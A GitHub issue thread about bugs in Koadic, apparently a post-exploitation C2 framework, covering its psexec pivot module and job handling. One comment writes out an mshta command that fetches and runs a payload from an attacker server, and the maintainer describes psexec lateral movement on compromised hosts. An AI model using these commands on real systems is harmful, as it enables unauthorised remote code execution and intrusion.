### ISSUE TITLE
use implant/pivot/exec_psexec 

### ISSUE THREAD

**Issue by k0l0ss** [zerosum0x0/koadic#125]
Hello guys,

I was playing a bit with pivots and found this error comes out on the zombie when I hit run:
![exec_psexec](https://user-images.githubusercontent.com/29979342/72202366-c252d500-345e-11ea-9253-d1df6b3e11ac.png)

**Comment by TheNaterz** [comment]
Same deal as the scanning, options are being set in plugin.run instead of job.create. It's probably in a bunch of other places as well. One sec.

**Comment by k0l0ss** [comment]
Thanks for the commitment.

**Comment by k0l0ss** [comment]
I found smth else:

Jobs closing but keeps printing:

![job_killed_but_showing](https://user-images.githubusercontent.com/29979342/72203055-1a8dd500-3467-11ea-8403-dbae2f2d22fd.png)

**Comment by k0l0ss** [comment]
Found something else:

Job is killed (or zombie?) but keeps printing:
![job_killed_but_showing](https://user-images.githubusercontent.com/29979342/72203082-5a54bc80-3467-11ea-8232-43ec8ef6e6ef.png)
from help:

(koadic: imp/sca/tcp)# help

        COMMAND     DESCRIPTION     
        ---------              -------------  
        kill                      kill a job or all jobs

**Comment by TheNaterz** [comment]
That's a typo, kill kills zombies, not jobs. Actually can't kill jobs from Koadic.

**Comment by k0l0ss** [comment]
> That's a typo, kill kills zombies, not jobs. Actually can't kill jobs from Koadic.

Would be nice to be able to remove "hanged" or "dead" jobs at least from gui.

**Comment by TheNaterz** [comment]
Sure, however, it's hard to make that determination from Koadic. If a job doesn't exit gracefully, then it can't relay its status back to Koadic. Basically a "if a tree falls in the forest and no one is around to hear it" problem.

If you want, I could add an option to hide a job/jobs manually? Hidden jobs could be separate and would be accessed with `jobs -h` or something.

**Comment by k0l0ss** [comment]
Yes, but at the moment we have a job that may have timed out (or hanged forever from a js error on target) and not being able to determine from the attacker if that job is going to ever finish.

Maybe not sending a command to kill the job, just hide it as you suggested. So you can keep track of what was launched before.

This was harder to respond than I expected and I am not entirely sure I have explained myself properly.

**Comment by TheNaterz** [comment]
I gotcha. Yeah, once a job gets launched, there's really no way to interact with it and tell it to kill. Best thing you can do is search target tasklist for any rundll32 (or whatever the fork process is) processes that have been hanging out for a while and then taskkill if you feel like it won't finish / need it to stop running (just make sure it isn't the Zombie process).

**Comment by k0l0ss** [comment]
In that case, then yes it would be usefull to have a way to mark down the jobs which failed/didn't respond. If you got many connections open/jobs it can be helpful.

Thank you again, im off for today :)

happy weekend

**Comment by TheNaterz** [comment]
I went ahead and pushed hiding jobs. `jobs -h JOB_ID` places a job into a hidden state. Hidden jobs can be viewed with `jobs -h`. Use `jobs -h JOB_ID` again to take it out of the hidden state.

**Comment by k0l0ss** [comment]
> I went ahead and pushed hiding jobs. `jobs -h JOB_ID` places a job into a hidden state. Hidden jobs can be viewed with `jobs -h`. Use `jobs -h JOB_ID` again to take it out of the hidden state.

Works great, thank's.

**Comment by k0l0ss** [comment]
Did you make implant/pivot/exec_psexec work? I am still unable.

**Comment by TheNaterz** [comment]
Have you pulled? What error are you seeing?

**Comment by k0l0ss** [comment]
I did pull fresh yes... 
I am using the CMD with no quotation marks, is it that correct? set cmd mshta http://IP:PORT/ID
I see in the victim box how the logs report the domain user **blabla**  has successfully connected, but no command is executed in the machine.
Tried to use ping back to my attacker box and also even a simple task like create a new file in the pivot wannabe.
I have no screenshots but I can try to find time and post.
Is this of any help? 
I have no clue on how to debug this on my own.

**Comment by TheNaterz** [comment]
Yes, this is helpful. Let me do some testing and see if I can come back with an answer.

**Comment by TheNaterz** [comment]
If you want to try debugging on your own, go into the implant .js file and place commands into an alert box. Ex: `alert(command);` Then try typing the output into cmd.exe and see what could be going wrong.

**Comment by k0l0ss** [comment]
I could not find the time to test. Did you find anything about it?

**Comment by TheNaterz** [comment]
As far as I can tell, exec_psexec is working just fine. Important to note that the user account must have admin rights on the target machine to run commands over psexec. Also, we're running psexec off of live.sysinternals.com. If the zombie machine can't reach the internet, then it won't be able to get psexec. In that case, you're best off downloading a copy of psexec to your server, uploading it to your zombie, and then launching commands off of it through the shell. Don't forget that pesky -accepteula flag.
